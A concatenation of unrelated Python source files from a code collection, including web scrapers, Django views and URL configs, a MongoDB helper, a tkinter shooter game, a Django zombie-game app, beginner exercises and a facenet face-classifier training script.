# makes one box-height's worth of vertical walls (wallChar lines)
def make_walls(s):
    global heightGoal
    if(heightGoal < wallChar):
        print('|'),
        print((' '*wallChar*2 + '| ')*s )
        heightGoal = heightGoal + 1;
        make_walls(s)
    else:
        heightGoal = 0 #reset height goal for the next row
##
make_grid(3)
make_grid(4)
|
984,642 | 631494313922fb6098d9c110fae98a8d199ce4e0 | # -*- coding: utf-8 -*-
from mustaine.client import HessianProxy
import urllib2
import json
proxy = HessianProxy('http://webservice.build.index.com:9011/webservice/3gcms')
class DocFetcher:
    """Fetches articles via the Hessian webservice and 163.com (Python 2)."""

    def fetchDoc(self, channelid, ftime, ttime, offset, size):
        """Fetch a page of 3G articles for a channel within a time window."""
        return proxy.get3GArticles(channelid, ftime, ttime, offset, size)

    def getDocByTopic(self, topicid, offset, size):
        """Fetch a page of topic articles and fill each one's full body."""
        docs = proxy.getTopicArticle(topicid, offset, size)
        for doc in docs:
            print 'id len: %d' % len(doc['docid'])
            # Topic listings carry no body; fetch it per-document over HTTP.
            doc['body'] = self.getBody(doc['docid'])
            print 'body len: %d, topicid: %s' % (len(doc['body']), doc['topicid'])
        return docs

    def getBody(self, docid):
        """Download a document's full body JSON; '' when no body field."""
        url = 'http://c.3g.163.com/nc/article/%s/full.html' % docid
        response = urllib2.urlopen(url)
        docInfo = response.read()
        docJson = json.loads(docInfo)
        # has_key is Python-2-only; dict is keyed by the docid itself.
        if docJson[docid].has_key('body'):
            return docJson[docid]['body']
        else:
            return ''
# Manual smoke test: fetch one page of a known topic and print it.
if __name__ == '__main__':
    fetcher = DocFetcher()
    # print fetcher.doFetch('0096', '2015-04-01 00:00:00', '2015-04-03 00:00:00', 0, 1)
    print fetcher.getDocByTopic('003402E6', 1, 2);
    # fetcher.getBody('AM2U46HE00964L1F')
|
984,643 | da4535c6b677c8fe2bd83675d58c16bb79987f8c | from social_core.backends.facebook import FacebookOAuth2
from . import BaseBackend
from ...site import AuthenticationBackends
class CustomFacebookOAuth2(BaseBackend, FacebookOAuth2):
    """Facebook OAuth2 backend wired into this project's backend registry."""

    # Identifier under which this backend is recorded in the database.
    DB_NAME = AuthenticationBackends.FACEBOOK
|
984,644 | bef50526bf4691760d960bf70ac5ffd67ea6457e | __author__ = 'frieder'
import random
import EventController
class Node:
    """Simulated sensor node that emits pseudo-random readings.

    Getter-style accessors are kept for API compatibility with the other
    source-node plugins consumed via EventController.
    """

    def __init__(self, id, samplingRate, location="Santander"):
        self.id = id
        self.samplingRate = samplingRate
        self.location = location
        # Identifies the plugin flavour to consumers.
        self.type = "Random Generator Source Node"

    def getSensorValue(self):
        """Return a fresh random reading in the closed range 1..10."""
        return random.randint(1, 10)

    def getSamplingRate(self):
        return self.samplingRate

    def getId(self):
        return self.id

    def getLocation(self):
        return self.location

    def getDescription(self):
        # Delegates to the project-level sensor-to-room mapping.
        return EventController.mapSensorToRoom(self.id)

    def getPluginType(self):
        return self.type
|
984,645 | deb545d02eb0f7c9690ae10ade0e1569eb6717f9 | # coding=utf-8
from pymongo import MongoClient
import pymongo
import json
from bson.objectid import ObjectId
client = MongoClient("192.168.8.200:27000")
target_db = client['single_cluster']
target_collection = target_db['clusters']
def move_to_one_collection():
    """Copy every document from every 'cluster_demo' collection into
    the single 'single_cluster.clusters' target collection (Python 2)."""
    db = client['cluster_demo']
    collection_name_list = db.list_collection_names()
    for name in collection_name_list:
        collection = db[name]
        records = collection.find()
        for item in records:
            target_collection.insert_one(item)
    print 'finished'


def get_event_by_pagenum_pagesize(pagenum, pagesize, collection):
    '''
    Fetch one page of events from the event list and print it as JSON.
    :param pagenum: page number (1-based)
    :param pagesize: number of items per page
    :param collection: event collection -- currently unused; the
        module-level ``target_collection`` is queried instead
    :return: prints a JSON array; each entry carries
        id: unique event identifier
        tweet: preview text of the event's first tweet
        keyword: summary keywords (truncated to at most 15)
    '''
    records = target_collection.find().skip((pagenum - 1) * pagesize).limit(pagesize).sort("_id", pymongo.ASCENDING)
    events_list = []
    for record in records:
        simple_msg = {}
        simple_msg['id'] = str(record.get("_id"))
        simple_msg['tweet'] = record.get('tweet_list')[0]['text']
        simple_msg['keyword'] = record.get('summary').get('keywords')
        if len(simple_msg['keyword']) > 15:
            simple_msg['keyword'] = simple_msg['keyword'][0:15]
        events_list.append(simple_msg)
    print json.dumps(events_list, indent=4, ensure_ascii=False)


def get_tweets_by_id(obj_id, page_num=1, pagesize=10):
    """Page through one event's tweet list (processing not implemented yet)."""
    obj_id = ObjectId(obj_id)
    event = target_collection.find_one({'_id': obj_id})
    tweets_list = []
    if event is not None:
        tweets = event.get('tweet_list')
        paged_tweets = tweets[(page_num - 1) * pagesize:page_num * pagesize]
        for item in paged_tweets:
            pass
            # print paged_tweets


# Manual smoke test entry point.
if __name__ == '__main__':
    get_event_by_pagenum_pagesize(2, 10, target_collection)
    # id = "5baf287917cc126f44e3bb55"
    # get_tweets_by_id(id)
|
984,646 | 96e24924aff6bb89b275925660470b3543b80e1a | import logging
from typing import Optional, Iterable
from . import View
from . import Model
from . import Statement
log = logging.getLogger(__name__) # pylint: disable=C0103
class Query:
    """Lazy, immutable query over a :class:`View`.

    Each :meth:`filter` call yields a *new* ``Query`` carrying one more
    :class:`Statement`; nothing is evaluated until :meth:`fetch`.
    """

    def __init__(self, view: View, statements: Optional[Iterable[Statement]] = None):
        log.debug('Query.__init__')
        self.view = view
        self.statements = statements or []

    def filter(self, statement: Statement) -> 'Query':
        """Return a new query with *statement* appended; ``self`` is untouched."""
        log.debug('Query.filter')
        combined = self.statements + [statement]
        return Query(self.view, combined)

    def fetch(self) -> Iterable[Model]:
        """Yield values whose keys satisfy every accumulated statement."""
        log.debug('Query.fetch')

        def _matches(key):
            # A key passes only if every statement accepts (view.indexer, key).
            return all(stmt(self.view.indexer, key) for stmt in self.statements)

        return (val for key, val in self.view.items() if _matches(key))
|
984,647 | b1d8b8a4899011ffaf577a2db2e4c8944735dcbe | import context
from src.petsittingco.application import db
from src.petsittingco.database import Account, Pet, Job
from werkzeug.security import generate_password_hash
# Seed fixtures: one owner account, one pet, and one sitting job.
acc1 = Account(id = "1", is_owner = True, is_sitter = False, is_shelter = False, is_admin = False, first_name = "John", last_name = "Smith", email = "JSmith@test.com", password = generate_password_hash("password123AIJI",method="SHA512"), address="1234 North Lincoln Road", phone_number="867-5309")
pet1 = Pet(id = "1", owner = acc1, name = "Fluffy", attributes = "{'Aggressive':'False'}")
job1 = Job(id = "1",lat=0.05, long=0.05,is_at_owner = True, canceled = False, start_datetime = "01/01/2020,15:30", end_datetime = "01/01/2020,16:30", location = "1234 Shady Lane, Baltimore, Maryland 21043", sitter = acc1, owner = acc1, accepted = False, details = "Please feed twice a day with food from cabinet")

# Each record is staged individually (replacing three copy-pasted try/except
# blocks) so one failure -- e.g. a duplicate key -- doesn't stop the rest.
for record in (acc1, pet1, job1):
    try:
        db.session.add(record)
    except Exception as e:
        print(e)

# Commit everything that was successfully staged.
try:
    db.session.commit()
except Exception as e:
    print(e)
984,648 | 2aba5fe2acd1ece04c7b678ac465b331759b1be4 | def dfs(nums, path, result):
if (len(nums) == len(path)):
result.append(path[:])
return
for n in nums:
if n in path:
continue
path.append(n)
dfs(nums, path, result)
path.pop()
def permute(nums):
    """Return all permutations of *nums* as a list of lists.

    Uses the standard library instead of the hand-rolled backtracking search;
    the output order (by element index) is identical for distinct elements,
    and duplicate elements are now handled correctly (the ``in path`` test in
    the original ``dfs`` silently dropped them).
    """
    from itertools import permutations  # local import: module deps unchanged
    if not nums:
        # Preserve the original contract: empty input -> empty list
        # (itertools.permutations would otherwise yield one empty tuple).
        return []
    return [list(p) for p in permutations(nums)]
print(permute([1, 2, 3]))
|
984,649 | 2b438825c5d7d8c2093089a08a273a76bf39f916 | from tkinter import *
import tkinter.messagebox
import time
import random
import winsound
window = Tk()
window.title ("Space Shooter")
img1 = PhotoImage(file="ship.png")
img2 = PhotoImage(file="missle_purple.png")
img3 = PhotoImage(file="missle_red.png")
points = 0
def play_shoot():
    """Play the shot sound effect (winsound is Windows-only)."""
    winsound.PlaySound('shoot.wav', 1)

def play_boom():
    """Play the explosion sound effect."""
    winsound.PlaySound('explosion.wav', 1)

def play_launch():
    """Play the game-start sound effect."""
    winsound.PlaySound('launch.wav', 1)

def new_game():
    """Build the canvas/sprites/score UI and run the main game loop.

    NOTE(review): ``game_over`` assigns ``active = False`` without
    ``nonlocal``, so it creates a local and never stops the ``while active``
    loop below -- the loop actually ends only via ``window.destroy()`` /
    ``SystemExit``, and replay works by recursive ``new_game()`` calls.
    """
    active = True
    global points
    points = 0
    play_launch()
    canvas = Canvas(window, width = 800, height = 650)
    canvas.pack()
    # Player ship near the bottom; missiles start above the visible area.
    ship = canvas.create_image(360, 550, anchor=NW, image=img1)
    rand_left = random.randint(50,750)
    rand_top = random.randint(100,700)
    missle1 = canvas.create_image(rand_left, -rand_top, anchor=NW, image=img2)
    rand_top = random.randint(100,700)
    rand_left = random.randint(50,750)
    missle2 = canvas.create_image(rand_left, -rand_top, anchor=NW, image=img3)
    score = Label(window, text="Score: 0")
    score.config(font=("Courier", 24))
    score.pack()
    def game_over():
        """Tear down the round and offer a replay (recursive restart)."""
        play_boom()
        active = False
        canvas.destroy()
        score.destroy()
        PlayAgain = tkinter.messagebox.askyesno ('Game Over','Do you want to play again?')
        if PlayAgain:
            new_game()
        else:
            window.destroy()
            raise SystemExit
    def update_score():
        # Refresh the score label from the global points counter.
        global points
        score.config(text="Score: %i" % points)
        score.update_idletasks()
    def move_left(evt):
        pos = canvas.coords(ship)
        if pos[0] > 0:
            canvas.move(ship, -15, 0)
    def move_right(evt):
        pos = canvas.coords(ship)
        if pos[0] < 730:
            canvas.move(ship, 15, 0)
    shots = []
    def shoot(evt):
        # Spawn a shot rectangle just above the ship's current position.
        pos = canvas.coords(ship)
        shot = canvas.create_rectangle(pos[0]+35, 530, pos[0]+40, 540, fill='green')
        shots.append(shot)
        play_shoot()
    def move_shots():
        """Advance all shots and resolve collisions against both missiles.

        NOTE(review): removes items from ``shots`` while iterating it, which
        can skip the following shot on the same tick.
        """
        for shot in shots:
            canvas.move(shot, 0, -5)
            pos = canvas.coords(shot)
            m1_pos = canvas.coords(missle1)
            m2_pos = canvas.coords(missle2)
            if pos[1] <= 0:
                canvas.delete(shot)
                shots.remove(shot)
            elif pos[1] <= m1_pos[1]+257 and pos[1] > m1_pos[1]:
                if pos[0] >= m1_pos[0]+5 and pos[0] <= m1_pos[0]+67:
                    print ("HIT1!")
                    reset_missle1()
                    canvas.delete(shot)
                    shots.remove(shot)
            elif pos[1] <= m2_pos[1]+257 and pos[1] > m2_pos[1]:
                if pos[0] >= m2_pos[0]+5 and pos[0] <= m2_pos[0]+67:
                    print ("HIT2!")
                    reset_missle2()
                    canvas.delete(shot)
                    shots.remove(shot)
    def move_missles():
        """Drop both missiles; a bottom or ship hit ends the round."""
        canvas.move(missle1, 0, 2)
        pos = canvas.coords(missle1)
        ship_pos = canvas.coords(ship)
        if pos[1]+257 >= 650:
            game_over()
        elif pos[1]+257 >= 550 and pos[0]+67 >= ship_pos[0] and pos[0] <= ship_pos[0]+76:
            game_over()
        canvas.move(missle2, 0, 2)
        pos = canvas.coords(missle2)
        if pos[1]+257 >= 650:
            game_over()
        elif pos[1]+257 >= 550 and pos[0]+67 >= ship_pos[0] and pos[0] <= ship_pos[0]+76:
            game_over()
    def reset_missle1():
        # Respawn missile 1 above the screen and award points.
        rand_left = random.randint(100,700)
        rand_top = random.randint(100,700)
        canvas.coords(missle1, rand_left, -rand_top)
        play_boom()
        global points
        points += 10
        update_score()
    def reset_missle2():
        # Respawn missile 2 above the screen and award points.
        rand_left = random.randint(50,750)
        rand_top = random.randint(100,700)
        canvas.coords(missle2, rand_left, -rand_top)
        play_boom()
        global points
        points += 10
        update_score()
    canvas.bind_all('<KeyPress-Left>', move_left)
    canvas.bind_all('<KeyPress-Right>', move_right)
    canvas.bind_all('<space>', shoot)
    # Hand-rolled ~66 FPS game loop driving tkinter updates manually.
    while active:
        move_shots()
        move_missles()
        window.update_idletasks()
        window.update()
        time.sleep(.015)
new_game() |
984,650 | 195ac59bfa651482b6536e017ca8fecd5c2672ac | """blogengine URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from .views import *
# URL routes for the core API; the ``name=`` values enable reverse() lookups.
urlpatterns = [
    path('', api, name = "api_url"),
    path('test/',test),
    path('core/v1/subscribers/existence', subscribers_existence, name = "api_subscribers_existence_url"),
    path('core/v1/debitor/existence', debitor_existence, name = "api_debitor_existence_url"),
    path('core/v1/debitor/create', debitor_create, name = "api_debitor_create_url"),
    path('core/v1/dolg/create', dolg_create, name = "api_dolg_create_url"),
    path('core/v1/history/create', history_create, name = "api_history_create_url"),
]
|
984,651 | bcd4d87f73f6c1686ba3dd3448bcf6cf8e29aee3 | # -*- encoding: utf-8 -*-
import datetime
import os
from django import template
from django.template import Node, resolve_variable, TemplateSyntaxError
from django.conf import settings
from djtrac.utils import url_params
register = template.Library()
@register.filter
def to_datetime(t):
    """
    Convert a timestamp to a local naive ``datetime``.

    :param t: time in microseconds since the epoch
    :return: ``datetime`` (sub-second precision truncated), or ``None``
        implicitly when *t* is falsy
    """
    if t:
        return datetime.datetime.fromtimestamp(int(t*0.000001))


@register.filter
def djtrac_ticket_url(ticket_id):
    """Build the absolute Trac URL for a ticket id."""
    return os.path.join(settings.HTTP_PATH_TO_TRAC, "neo/ticket/", str(ticket_id))


class AddParameter(Node):
    """Template node that re-renders the current URL with one query
    parameter added/overridden.

    https://djangosnippets.org/snippets/361/
    """
    def __init__(self, varname, value):
        self.varname = varname
        self.value = value

    def render(self, context):
        req = resolve_variable('request', context)
        params = req.GET.copy()
        # Value may be a context variable; fall back to the literal text.
        try:
            value = resolve_variable(self.value, context)
        except Exception:
            value = self.value
        params[self.varname] = value
        return '%s?%s' % (req.path, params.urlencode())


# Tag parser for {% addurlparameter name value %} (Python-2 raise syntax).
def addurlparameter(parser, token):
    from re import split
    bits = split(r'\s+', token.contents, 2)
    if len(bits) < 2:
        raise TemplateSyntaxError, "'%s' tag requires two arguments" % bits[0]
    return AddParameter(bits[1],bits[2])


register.tag('addurlparameter', addurlparameter)


@register.filter
def get_params(request):
    """Serialize the request's query string, dropping the 'page' parameter."""
    return url_params(request, as_is=True, use_urllib=True, except_params="page")
|
984,652 | fc05c7b235f4c1351d74eae9c791ec5f19f81b18 | print("Twinkle, twinkle, little star,")
print('\t',"How I wonder what you are!")
print('\t','\t',"Up above the world so high,")
print('\t','\t',"Like a diamond in the sky.")
print("Twinkle, twinkle, little star,")
print('\t',"How I wonder what you are")
import sys
print("Python version")
print (sys.version)
from datetime import datetime
now = datetime. now()
print(now)
Radius=int(input("Enter Radius:"))
Area=3.142*(Radius**2)
print("Area of circle:",Area)
First=input("Enter First Name:")
Last=input("Enter Last Name:")
Name=Last[::-1]+ " " +First[::-1]
print(Name)
x=int(input("Enter x:"))
y=int(input("Enter y:"))
z=x+y
print(z)
|
984,653 | 2654a7ec81b56b625d128a4748840c2552f0905d | vel = float(input('Informe a velocidade do carro em Km/h'))
if (vel > 80):
print('Você foi multado')
vel -= 80
print('Sua multa é de R${:.2f}'.format(vel * 7.00))
else:
print('Dirija com segunça')
print('Siga em frente') |
984,654 | 4921c9045a7e6deb0138c957aeea75cafe02609d | #!/usr/bin/env python
import cProfile
import pstats
from subprocess import PIPE, Popen
import numpy as np
from lmfit import Parameters, minimize
def get_git_version():
    """Return the abbreviated hash of the current git HEAD (as bytes)."""
    with Popen(['git', 'rev-parse', '--short', 'HEAD'], stdout=PIPE) as proc:
        stdout, _ = proc.communicate()
    return stdout.strip()
# define objective function: returns the array to be minimized
def fcn2min(params, x, data):
    """Residuals of a decaying sine-wave model against *data*.

    *params* must be indexable by 'amp', 'shift', 'omega' and 'decay'
    (an lmfit ``Parameters`` object or a plain dict works).
    """
    amp, shift, omega, decay = (params[name]
                                for name in ('amp', 'shift', 'omega', 'decay'))
    model = amp * np.sin(omega * x + shift) * np.exp(-decay * x * x)
    return model - data
def run_fit(nruns=100):
    """Fit the decaying-sine model *nruns* times on noisy synthetic data.

    Seeded for reproducibility; the asserts sanity-check that each fit
    recovers roughly amp=5 and omega=2.
    """
    # create data to be fitted
    x = np.linspace(0, 15, 601)
    np.random.seed(201)
    for i in range(nruns):
        data = (5. * np.sin(2 * x - 0.1) * np.exp(-x*x*0.025) +
                np.random.normal(size=len(x), scale=0.1))
        params = Parameters()
        params.add('amp', value=1.0, min=0.0, max=100.0)
        params.add('decay', value=0.0, min=-1.0, max=10.0)
        params.add('shift', value=0.0, min=-np.pi/2., max=np.pi/2)
        params.add('omega', value=1.0, min=-10.0, max=10.0)
        out = minimize(fcn2min, params, args=(x, data))
        # print(out.params['amp'])
        assert out.params['amp'].value < 5.5
        assert out.params['amp'].value > 4.5
        assert out.params['omega'].value < 2.25
        assert out.params['omega'].value > 1.75
        # print(out.params['amp'])


def show_profile(filename):
    """Print the 20 most expensive functions from a saved profile file."""
    stats = pstats.Stats(filename)
    stats.strip_dirs().sort_stats('tottime').print_stats(20)


def profile_command(command, filename=None):
    """Profile *command* (a statement string), naming the output after HEAD."""
    gitversion = get_git_version()
    if filename is None:
        filename = '%s.prof' % gitversion
    cProfile.run(command, filename=filename)
    show_profile(filename)
profile_command('run_fit()')
|
984,655 | 8fb96b150a4b0d1e35a78b465f3388c6c00b3211 | import pandas as pd
# Heights (cm) keyed by Thai first names; keys are runtime data, untranslated.
dic = {"สมศรี":167, "พิมพ์พร":170, "สุดใจ":165, "สมหญิง":164}
# Building a Series from a dict uses the keys as the index.
ps = pd.Series(dic)
print("------------------------------------")
print(type(dic))
print(ps)
|
984,656 | 8b49e70d5ced861c1743d9efb0a3a0d6afa8ebf9 | class Solution:
def maxSubArrayLen(self, a: List[int], k: int) -> int:
g = {0 : -1}
s = 0
z = 0
for i in range(len(a)):
s += a[i]
if s - k in g:
z = max(z, i - g[s - k])
if s not in g:
g[s] = i
return z |
984,657 | 1d8e5b09475a2d32b31e39b0deba80dae38a7bd2 | #!/usr/bin/env python
import unittest
class MyTest(unittest.TestCase):
    """Scaffolding for HTTP tests against the staging host.

    NOTE(review): ``tearDown`` prints ``self.result``, but nothing in this
    class sets that attribute -- any test method that doesn't assign
    ``self.result`` will raise AttributeError during teardown.  Confirm the
    intended usage before adding tests.
    """

    # Base address of the service under test.
    base_url = "http://139.196.43.67:8080/"

    # def setUp(self,url):
    #     self.base_url = "http://139.196.43.67:8080/"
    #     return self.base_url
    def tearDown(self):
        print(self.result)
|
984,658 | 81d9feafebe97ac6330ec2b6e70e47a8cdcb4494 | import user
from models import UserProfile
from django.shortcuts import render, render_to_response
from forms import UserForm, UserProfileForm
from django.contrib.auth import authenticate, logout
from django.contrib.auth import login as auth_login
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from engine.main import show_game_screen
from engine.game import Game
import pickle
#Homepage view
def index(request):
    """Render the static homepage."""
    return render(request, 'zombieGame/index.html')

#About page view
def about(request):
    """Render the static about page."""
    return render(request, 'zombieGame/about.html')

#Login view
def login(request):
    """Render the login page (authentication handled elsewhere)."""
    context_dict = {'boldmessage': "login"}
    return render(request, 'zombieGame/login.html', context_dict)
#Profile view, requires user to be logged in
@login_required
def profile(request):
    """Show the user's stats and award badges past fixed thresholds.

    NOTE(review): badge flags are set on the in-memory profile only -- no
    ``save()`` here; confirm persistence happens elsewhere.
    """
    days = request.user.userprofile.days
    kills = request.user.userprofile.kills
    people = request.user.userprofile.people
    food = request.user.userprofile.food
    ammo = request.user.userprofile.ammo
    time = request.user.userprofile.time
    profile = request.user.userprofile
    # Badge thresholds: survival, kills, food gathered, party size.
    if profile.days > 30:
        profile.survivorBadge = True
    if profile.kills > 50:
        profile.killerBadge = True
    if profile.food > 80:
        profile.staminaBadge = True
    if profile.people > 40:
        profile.partyBadge = True
    context_dict = {'profile': profile, 'days': days, 'kills': kills, 'people': people,
                    'food': food,'ammo': ammo, 'time': time}
    return render(request, 'zombieGame/profile.html', context_dict)
@login_required
def game(request):
    """Drive one request's worth of game state and render the game screen.

    NOTE(review): ``t`` is always '' here, so none of the ``take_turn``
    branches can fire; the pickle dump/load of ``player_state`` is an
    identity round-trip (a deep copy at best).  This looks like
    work-in-progress wiring -- confirm intended turn input source.
    """
    g=Game()
    t=''
    player = request.user.userprofile
    #Can initialise these using player state !!??
    pps = pickle.dumps(g.player_state)
    kills = 0
    days = 0
    food = 3
    ammo = 2
    people = 1
    g.player_state = pickle.loads(pps)
    context_dict = {'player':player, 'game_over':False, 'new_day':False, 'kills':kills, 'food':food, 'days':days, 'ammo': ammo, 'party': people,
                    'player_state': g.player_state }
    if g.is_game_over():
        context_dict['game_over'] = True
    else:
        g.start_new_day()
    if g.is_day_over():
        g.end_day()
        g.start_new_day()
    if context_dict['game_over'] == False and context_dict['new_day'] == False:
        # Dispatch the player's turn choice (t is currently always '').
        if t == 'MOVE':
            g.take_turn('MOVE')
        elif t == ('ENTER'):
            g.take_turn('ENTER')
        elif t == ('WAIT'):
            g.take_turn('WAIT')
        elif t == ('FIGHT'):
            g.take_turn('FIGHT')
        elif t == ('SEARCH'):
            g.take_turn('SEARCH')
        elif t == ('EXIT'):
            g.take_turn('EXIT')
        elif t ==('RUN'):
            g.take_turn('RUN')
        context_dict = fill_dict(g)
        context_dict['state'] = str(g.player_state)
        context_dict['gstate'] = g.game_state
        context_dict['time'] = g.time_left
    if g.is_game_over():
        context_dict={'game_over':True}
    elif g.is_day_over():
        context_dict={'new_day':True}
    # Console-only status messages (Python 2 prints); not sent to the template.
    if g.update_state.party<0:
        print "You lost: {0} people".format(abs(g.update_state.party))
    elif g.update_state.party>0:
        print "{0} more people have joined your party".format(g.update_state.party)
    elif g.update_state.ammo > 0:
        print "You found: {0} units of ammo".format(g.update_state.ammo)
    elif g.update_state.ammo < 0:
        print "You used: {0} units of ammo".format(abs(g.update_state.ammo))
    elif g.update_state.food > 0:
        print "You found: {0} units of food".format(g.update_state.food)
    elif g.update_state.food < 0:
        print "You used: {0} units of food".format(abs(g.update_state.food))
    elif g.update_state.kills > 0:
        print "You killed: {0} zombies".format(g.update_state.kills)
    elif g.update_state.days > 0:
        print "New Day: You survived another day!"
    #Put these updates into a dictionary Q pickle ?
    return render(request, 'zombieGame/game.html', context_dict)
def house(request):
    """Render the inside-a-house view with a freshly started game day."""
    g = Game()
    g.start_new_day() #need to pickle so not resetting up again
    context_dict = house_dict(g)
    return render(request, 'zombieGame/house.html', context_dict)
def house_dict(g):
    """Build the template context for the house view: the house the player
    is currently in and the room they currently occupy."""
    here = g.street.get_current_house()
    room = g.street.get_current_house().get_current_room()
    return {'current_house': here, 'current_room': room}
#The main game view, requires user to be logged in
#@login_required
#def startGame(request):
# g = Game()
# g.start_new_day()
# #feel like the pickle stuff should be here but where does it go ?
# context_dict=fill_dict(g)
# return render(request, 'zombieGame/game.html', context_dict)
#need to add ammo, partysize, days
#In this view we create a context_dict variable, which we can alter what is outputted to the game.html
#this is only for street used a separate one for house
def fill_dict(g):
    """Build the street-level template context for game.html.

    This is only used for the street view; the house view uses house_dict.
    Removed: an unreachable loop after the return statement that indexed a
    nonexistent 'house_no' key.
    """
    context_dict = {'player_state': g.player_state,
                    'street': g.street,
                    'house_list': g.street.house_list,
                    'current_house': g.street.get_current_house(),
                    'turn': g.turn_options(),
                    # NOTE(review): literal placeholder kept as-is — looks like
                    # an unfinished house-number listing; confirm against the
                    # game.html template before changing.
                    'house_num': ['house_no']}
    return context_dict
#Leaderboards view, requires user to be logged in
@login_required
def leaderboard(request):
    """Show the top-10 players by kills, days survived and party size."""
    # ranks 1..10 used by the template to number the rows
    num = [1,2,3,4,5,6,7,8,9,10]
    kills = UserProfile.objects.order_by('-kills')[:10]
    days = UserProfile.objects.order_by('-days')[:10]
    people = UserProfile.objects.order_by('-people')[:10]
    context_dict = {'index':num, 'kills':kills, 'days':days, 'people':people,}
    return render(request, 'zombieGame/leaderboard.html', context_dict)
#Register view
def register(request):
    """Handle account sign-up: validate the user/profile forms on POST,
    hash the password, attach the optional picture and save the profile."""
    registered = False
    if request.method == 'POST':
        user_form = UserForm(data=request.POST)
        profile_form = UserProfileForm(data=request.POST)
        if user_form.is_valid() and profile_form.is_valid():
            user = user_form.save()
            # set_password hashes the raw password from the form
            user.set_password(user.password)
            user.save()
            # delay saving the profile until the user FK is attached
            profile = profile_form.save(commit=False)
            profile.user = user
            if 'picture' in request.FILES:
                profile.picture = request.FILES['picture']
            # profile.user.kills = 0
            # profile.user.survival = 0
            profile.save()
            registered = True
        else:
            print user_form.errors, profile_form.errors
    else:
        # GET: present empty forms
        user_form = UserForm()
        profile_form = UserProfileForm()
    return render(request,
                  'zombieGame/register.html',
                  {'user_form': user_form, 'profile_form': profile_form, 'registered': registered} )
#Login view
def user_login(request):
    """Authenticate posted credentials and start a session.

    GET renders the login form; successful POST redirects to the profile.
    """
    if request.method == 'POST':
        username = request.POST.get('username')
        password = request.POST.get('password')
        user = authenticate(username=username, password=password)
        if user:
            if user.is_active:
                auth_login(request, user)
                return HttpResponseRedirect('/zombieGame/profile/')
            else:
                return HttpResponse("Your account is disabled.")
        else:
            # NOTE(review): printing the raw password is a security risk —
            # consider logging the username only.
            print "Invalid login details: {0}, {1}".format(username, password)
            return HttpResponse("Invalid login details supplied.")
    else:
        return render(request, 'zombieGame/login.html', {})
#Logout view
@login_required
def user_logout(request):
    """End the current session and redirect to the app landing page."""
    logout(request)
    return HttpResponseRedirect('/zombieGame/')
984,659 | af28eb8a2fcd2774fd9070e086aef35bf81093ad | """An example of how to use your own dataset to train a classifier that recognizes people.
"""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import datetime
import math
import os
from os import path
import pickle
import sys
import shutil
import numpy as np
from sklearn import svm
import facenet
from ml_serving.drivers import driver
try:
from mlboardclient.api import client
except ImportError:
client = None
def update_data(data, use_mlboard, mlboard):
    """Push *data* into the mlboard task info when reporting is enabled.

    Silently does nothing when mlboard reporting is off or unavailable.
    """
    if not (use_mlboard and mlboard):
        return
    mlboard.update_task_info(data)
def upload_model(use_mlboard, mlboard, classifier_path, model, version):
    """Upload the trained classifier file to mlboard as *model*:*version*.

    No-op when mlboard reporting is disabled or unavailable. The classifier
    is staged in a temporary directory which is always cleaned up, even if
    the upload itself raises.
    """
    if not use_mlboard or not mlboard:
        return
    print('Uploading model...')
    dirname = '/tmp/classifier'
    # exist_ok guards against leftovers from a previously interrupted run
    os.makedirs(dirname, exist_ok=True)
    shutil.copy(classifier_path, path.join(dirname, path.basename(classifier_path)))
    try:
        mlboard.model_upload(model, version, dirname)
    finally:
        # always remove the staging directory, even on upload failure
        shutil.rmtree(dirname)
    update_data({'model_uploaded': True}, use_mlboard, mlboard)
    print("New model uploaded as '%s', version '%s'." % (model, version))
def main(args):
    """Extract facenet embeddings for a dataset, then train or evaluate an
    SVM face classifier, optionally logging/uploading through mlboard.
    """
    use_mlboard = False
    mlboard = None
    if client:
        # probe the mlboard service; fall back to local-only operation
        mlboard = client.Client()
        try:
            mlboard.apps.get()
        except Exception:
            mlboard = None
            print('Do not use mlboard.')
        else:
            print('Use mlboard parameters logging.')
            use_mlboard = True
    if args.use_split_dataset:
        dataset_tmp = facenet.get_dataset(args.data_dir)
        train_set, test_set = split_dataset(dataset_tmp, args.min_nrof_images_per_class,
                                            args.nrof_train_images_per_class)
        if args.mode == 'TRAIN':
            dataset = train_set
        elif args.mode == 'CLASSIFY':
            dataset = test_set
    else:
        dataset = facenet.get_dataset(args.data_dir)
    update_data({'mode': args.mode}, use_mlboard, mlboard)
    # Check that there are at least one training image per class
    for cls in dataset:
        assert len(cls.image_paths) > 0, 'There must be at least one image for each class in the dataset'
    paths, labels = facenet.get_image_paths_and_labels(dataset)
    print('Number of classes: %d' % len(dataset))
    print('Number of images: %d' % len(paths))
    data = {
        'num_classes': len(dataset),
        'num_images': len(paths),
        'model_path': args.model,
        'image_size': args.image_size,
        'data_dir': args.data_dir,
        'batch_size': args.batch_size,
    }
    update_data(data, use_mlboard, mlboard)
    # Load the model
    print('Loading feature extraction model')
    # Load driver
    drv = driver.load_driver(args.driver)
    # Instantinate driver
